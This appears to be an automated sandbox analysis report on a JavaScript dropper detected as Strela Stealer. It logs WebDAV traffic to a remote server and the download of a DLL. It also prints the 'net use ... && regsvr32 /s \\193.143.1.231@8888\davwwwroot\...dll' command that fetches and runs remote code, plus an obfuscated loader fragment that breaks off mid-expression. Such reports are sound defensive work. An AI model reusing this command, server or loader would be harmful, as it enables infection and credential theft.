                Dec 17, 2024 15:11:16.758315086 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:32.688664913 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:32.688749075 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:32.688838005 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:32.808454037 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:36.827694893 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:36.827805996 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:36.827982903 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:36.947772980 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:38.691781044 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:38.691894054 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:38.691981077 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:38.811532974 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:41.988157034 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:41.988291979 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:41.988373041 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:42.107981920 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:43.653124094 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:43.653194904 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:43.653248072 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:43.773118019 CET888849709193.143.1.231192.168.2.5

                HTTP Request Dependency Graph

                • 193.143.1.231:8888

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704193.143.1.23188884832C:\Windows\System32\net.exe
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:11:02.332396984 CET107OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: DavClnt
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:11:03.779273987 CET223INHTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:03 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.549705193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:11:07.183607101 CET137OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:11:08.594680071 CET223INHTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:08 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.549706193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:11:10.288436890 CET692INHTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:10 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 4d 6f 6e 2c 20 31 36 20 44 65 63 20 32 30 32 34 20 31 32 3a 31 33 3a 32 31 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname></D:displayname></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.549707193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:11:11.848124981 CET692INHTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:11 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 4d 6f 6e 2c 20 31 36 20 44 65 63 20 32 30 32 34 20 31 32 3a 31 33 3a 32 31 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:displayname></D:displayname><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.549708193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:11:13.516463041 CET854INHTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:13 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 682
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 31 34 30 33 34 31 36 32 35 36 32 33 38 36 33 2e 64 6c 6c 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 34 31 38 38 31 36 3c 2f 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 6e 67 74 68 3e 3c 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 37 20 44 65 63 20 32 30 32 34 20 31 34 3a 31 30 3a 32 32 20 47 4d 54 3c 2f 44 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 44 3a 67 65 74 65 74 61 67 3e 22 31 38 31 31 66 63 33 31 64 63 62 66 33 65 39 30 36 36 34 30 30 22 3c 2f 44 3a 67 65 74 65 74 61 67 3e 3c 44 3a 73 75 70 70 [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/140341625623863.dll</D:href><D:propstat><D:prop><D:resourcetype></D:resourcetype><D:getcontentlength>418816</D:getcontentlength><D:getlastmodified>Tue, 17 Dec 2024 14:10:22 GMT</D:getlastmodified><D:getetag>"1811fc31dcbf3e9066400"</D:getetag><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:displayname>140341625623863.dll</D:displayname><D:getcontenttype>application/octet-stream</D:getcontenttype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.549709193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:11:13.641015053 CET195OUTGET /140341625623863.dll HTTP/1.1
                Cache-Control: no-cache
                Connection: Keep-Alive
                Pragma: no-cache
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:11:15.072145939 CET1236INHTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:11:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 418816
                Connection: keep-alive
                Accept-Ranges: bytes
                Etag: "1811fc31dcbf3e9066400"
                Last-Modified: Tue, 17 Dec 2024 14:10:22 GMT
                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00 19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00 f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdQag" `W.text `.rdatax@@.data@.pdatab@@


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
                Imagebase:0x7ff75c990000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:1
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b0a0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:2
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff63b0a0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\net.exe
                Wow64 process (32bit):false
                Commandline:net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff6f84a0000
                File size:59'904 bytes
                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:09:11:10
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b0a0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:09:11:10
                Start date:17/12/2024
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff7fa860000
                File size:25'088 bytes
                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Disassembly

                Code Analysis

                Call Graph

                • Executed
                • Not Executed
                callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 ftewq E1C0->F3C2

                Script:

                Code
                0
                function ftewq() {
                • ftewq() ➔ undefined
                1
                this[hfgkhke + iqkshjqkp + conprmvk + mwncmi] ( gebyyu + eoztg + jqskgadc + jvaxx + xqqrniwzz + zxqbq + qtwic + cblmmvh + cblmmvh + iqkshjqkp + acrinokm + qtwic + gebyyu + conprmvk + djwmv + ktqhqp + djwmv + woscoo + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + oindqeulx + mclcpkxr + jvaxx + zsthedrh + hdgtouue + conprmvk + qtwic + ofjnsbxia + acrinokm + qtwic + oindqeulx + tqyfu + yptqmnxq + iqkshjqkp + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + slaxzev + xqqrniwzz + ktqhqp + jqskgadc + qxdyfx + mcyra + mclcpkxr + ofjnsbxia + conprmvk + cblmmvh + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + ofjnsbxia + gbeabu + zxqbq + djwmv + smafnpnc + yptqmnxq + iqkshjqkp + zsthedrh + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + gbeabu + jvaxx + ktqhqp + woscoo + djwmv + zsthedrh + acrinokm + zsthedrh + gebyyu + mclcpkxr + eoztg + mclcpkxr + djwmv + acrinokm + gbeabu + jqskgadc + zxqbq + qtwic + mclcpkxr + hfgkhke + mcyra + mwncmi + qxdyfx + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + slaxzev + yzkeee + zxqbq + qtwic + cblmmvh + cblmmvh + iqkshjqkp + acrinokm + qtwic + gebyyu + conprmvk + djwmv + ktqhqp + djwmv + woscoo + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + oindqeulx + mclcpkxr + jvaxx + zsthedrh + hdgtouue + conprmvk + qtwic + ofjnsbxia + acrinokm + qtwic + oindqeulx + tqyfu + yptqmnxq + iqkshjqkp + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + qtwic + gebyyu + conprmvk + djwmv + ktqhqp + djwmv + woscoo + acrinokm + hfgkhke + gbeabu + ywkps + gebyyu + hdgtouue + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + jrzvb + xqqrniwzz + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + yptqmnxq + ofjnsbxia + woscoo + smafnpnc + conprmvk + acrinokm + ywkps + qxdyfx + mclcpkxr + ktqhqp + mclcpkxr + slaxzev + yzkeee + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + woscoo + djwmv + gebyyu + mclcpkxr + yptqmnxq + zxqbq + qxdyfx + mclcpkxr + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + woscoo + djwmv + gebyyu + mclcpkxr + yptqmnxq + zxqbq + qxdyfx + mclcpkxr + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + ywkps + qxdyfx + mclcpkxr + ktqhqp + mclcpkxr + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + yptqmnxq + ofjnsbxia + woscoo + smafnpnc + conprmvk + acrinokm + oindqeulx + iqkshjqkp + conprmvk + qxdyfx + qxdyfx + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + smafnpnc + ktqhqp + jqskgadc + woscoo + mwncmi + qxdyfx + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + zxqbq + jqskgadc + eoztg + ofjnsbxia + gbeabu + mclcpkxr + ktqhqp + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + ofjnsbxia + gbeabu + zxqbq + djwmv + smafnpnc + yptqmnxq + iqkshjqkp + zsthedrh + acrinokm + jqskgadc + mclcpkxr + zsthedrh + jvaxx + eoztg + oindqeulx + mclcpkxr + zsthedrh + djwmv + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + mclcpkxr + gbeabu + iqkshjqkp + qxdyfx + jqskgadc + acrinokm + mclcpkxr + gbeabu + iqkshjqkp + qxdyfx + jqskgadc + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + woscoo + djwmv + gebyyu + mclcpkxr + yptqmnxq + zxqbq + qxdyfx + mclcpkxr + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + eoztg + qtwic + hdgtouue + gebyyu + gbeabu + mcyra + mcyra + hfgkhke + acrinokm + oindqeulx + iqkshjqkp + conprmvk + qxdyfx + qxdyfx + acrinokm + jqskgadc + mclcpkxr + zsthedrh + jvaxx + eoztg + oindqeulx + mclcpkxr + zsthedrh + djwmv + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + oindqeulx + iqkshjqkp + conprmvk + qxdyfx + qxdyfx + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + smafnpnc + ktqhqp + jqskgadc + woscoo + mwncmi + qxdyfx + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + qtwic + conprmvk + gbeabu + mcyra + 